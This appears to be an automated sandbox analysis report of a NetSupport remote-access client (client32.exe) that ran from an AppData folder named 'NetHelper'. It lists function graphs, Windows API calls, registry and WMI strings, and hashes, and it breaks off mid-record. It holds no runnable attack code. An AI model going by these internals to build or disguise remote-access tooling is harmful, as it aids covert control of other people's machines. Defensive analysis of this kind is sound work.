                                                                                                                              Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 834 111457a0-111457c0 835 111457c2-111457d6 call 11029a70 834->835 836 111457d9-111457db 834->836 835->836 837 111457ed-111457f5 836->837 838 111457dd-111457e7 836->838 840 11145971-11145986 call 11162bb7 837->840 841 111457fb-1114582b call 110963a0 GetModuleFileNameA call 11081e00 837->841 838->837 849 11145831-1114585c SHGetFolderPathA 841->849 850 11145959-1114596a call 11142e60 841->850 852 1114585e-1114585f 849->852 853 1114588b 849->853 850->840 856 11145884-11145889 852->856 857 11145861-11145862 852->857 854 11145890-111458cd SHGetFolderPathA call 11143a20 call 1102ad70 853->854 866 111458d0-111458d6 854->866 856->854 859 11145864-1114587b call 11029a70 857->859 860 1114587d-11145882 857->860 859->854 860->854 866->866 867 111458d8-111458e2 866->867 868 111458e4-111458e9 867->868 868->868 869 111458eb-111458f5 868->869 870 111458f6-111458fc 869->870 870->870 871 111458fe-11145913 call 11145240 870->871 873 11145918-1114591d 871->873 874 11145920-11145931 873->874 874->874 875 11145933-1114593a 874->875 876 11145940-11145946 875->876 876->876 877 11145948-11145958 876->877 877->850
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                              • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                              • API String ID: 3494822531-1878648853
                                                                                                                              • Opcode ID: 24d87a64627cab5ad91252514022c9cb8009f58f212d92025f6c6eeea78916e9
                                                                                                                              • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                                                              • Opcode Fuzzy Hash: 24d87a64627cab5ad91252514022c9cb8009f58f212d92025f6c6eeea78916e9
                                                                                                                              • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11163CB2 Relevance: 10.6, APIs: 7, Instructions: 74COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 878 11163cb2-11163cda RtlDecodePointer DecodePointer 879 11163ce0-11163cea 878->879 880 11163d61 878->880 879->880 881 11163cec-11163cfa call 1116fe8f 879->881 882 11163d63-11163d67 880->882 885 11163d44-11163d5f EncodePointer * 2 881->885 886 11163cfc-11163d03 881->886 885->882 887 11163d07-11163d0b 886->887 888 11163d05 886->888 889 11163d1c-11163d21 887->889 890 11163d0d-11163d1a call 1116acca 887->890 888->887 889->880 892 11163d23-11163d30 call 1116acca 889->892 890->889 895 11163d32-11163d3f EncodePointer 890->895 892->880 892->895 895->885
                                                                                                                              APIs
                                                                                                                              • RtlDecodePointer.NTDLL(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CC7
                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CD4
                                                                                                                              • __realloc_crt.LIBCMT ref: 11163D11
                                                                                                                              • __realloc_crt.LIBCMT ref: 11163D27
                                                                                                                              • EncodePointer.KERNEL32(00000000,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D39
                                                                                                                              • EncodePointer.KERNEL32(?,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D4D
                                                                                                                              • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D55
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Pointer$Encode$Decode__realloc_crt
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4108716018-0
                                                                                                                              • Opcode ID: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
                                                                                                                              • Instruction ID: 9b559eab580439f7d32e9cac7dbac1f1bc4b8bf1504d6bec0d436b7e194fb771
                                                                                                                              • Opcode Fuzzy Hash: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
                                                                                                                              • Instruction Fuzzy Hash: EA11D632518236AFDB005F79DCD488EFBEDEB41268751043AE819D7211EBB2ED54DB80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WaitForSingleObject.KERNEL32(00000350,000000FF), ref: 1101792C
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                                              • CoUninitialize.OLE32 ref: 110179C0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                              • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                              • API String ID: 2407233060-578995875
                                                                                                                              • Opcode ID: e36d99758dc03e0598981b4f88c4856ef9492612d0c70df356ba7875e798591a
                                                                                                                              • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                                                              • Opcode Fuzzy Hash: e36d99758dc03e0598981b4f88c4856ef9492612d0c70df356ba7875e798591a
                                                                                                                              • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WaitForSingleObject.KERNEL32(00000350,000000FF), ref: 11017842
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                                              • CoUninitialize.OLE32 ref: 110178D0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                              • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                              • API String ID: 2407233060-2037925671
                                                                                                                              • Opcode ID: 7fe03c0a07b0f7c8829a27351349684dd2fb94aad29d92fbe6e61ac0174dbd6e
                                                                                                                              • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                                                              • Opcode Fuzzy Hash: 7fe03c0a07b0f7c8829a27351349684dd2fb94aad29d92fbe6e61ac0174dbd6e
                                                                                                                              • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11096D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                                              • CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                              • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                              • API String ID: 3222248624-258972079
                                                                                                                              • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                                                              • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                                                                              • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                                                              • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,77D59EB0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                                                              • CreateThread.KERNEL32 ref: 1111007A
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                                                              • FindCloseChangeNotification.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                                                                              • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                              • API String ID: 2579639479-1136101629
                                                                                                                              • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                                              • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                                                              • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                                              • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                              • String ID: NSMDesktopWnd
                                                                                                                              • API String ID: 2669163067-206650970
                                                                                                                              • Opcode ID: f412c802fa78ea5983901fd5e9bd27c26c396090c77b4c7bd5d98287236fca51
                                                                                                                              • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                                                                              • Opcode Fuzzy Hash: f412c802fa78ea5983901fd5e9bd27c26c396090c77b4c7bd5d98287236fca51
                                                                                                                              • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpen
                                                                                                                              • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                              • API String ID: 47109696-3245241687
                                                                                                                              • Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                                                              • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                                                                              • Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                                                              • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                                                • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                                                                              • ResetEvent.KERNEL32(000002B0), ref: 11144E39
                                                                                                                              • SetEvent.KERNEL32(000002B0), ref: 11144E4F
                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
